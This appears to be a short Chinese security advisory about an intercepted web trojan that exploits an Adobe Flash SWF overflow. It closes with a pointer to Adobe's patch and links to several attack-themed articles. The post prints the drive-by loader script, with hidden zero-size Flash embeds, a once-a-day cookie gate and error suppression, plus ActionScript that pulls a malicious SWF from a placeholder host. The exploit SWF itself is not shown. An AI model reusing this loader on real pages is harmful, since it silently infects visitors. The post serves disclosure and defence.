最近几天拦截到利用AdobeFlashPlayerSWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:
<script>
window.onerror=function(){returntrue;}
functioninit(){window.status=”";}window.onload=init;
if(document.cookie.indexOf(”play=”)==-1){
varexpires=newDate();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write('<objectclassid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″width=”0″height=”0″align=”middle”>');
document.write('<paramname=”allowScriptAccess”value=”sameDomain”/>');
document.write('<paramname=”movie”value=”http://www.XXX.cn/flash/XX.swf”/>');
document.write('<paramname=”quality”value=”high”/>');
document.write('<paramname=”bgcolor”value=”#ffffff”/>');
document.write('<embedsrc=”http://www.XXX.cn/flash/XX.swf”src=”http://www.XXX.cn/flash/XX.swf”/>');
document.write('</object>');
}else
{document.write(”<EMBEDsrc=http://www.XXX.cn/flash/XX.swfwidth=0height=0>”);}}
</script>以下为正常的FLASH文件使用的脚本:
//Actionscript…//[ActioninFrame1]
varflashVersion=/hxversion;
loadMovie(”http://www.XXX.cn/flash/”+flashVersion+“mal_swf.swf”,_root);
stop();
该恶意FLASH部分内容如下:
建议:
厂商补丁:Adobe
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.adobe.com/go/getflash
【FLASH网马官方补丁】相关文章:
★ 用asp记录论坛用户密码(dvbbs,leadbbs等)
★ 四大漏洞入侵博客
★ 获得leadbbs论坛站webshell后进后台最简便之法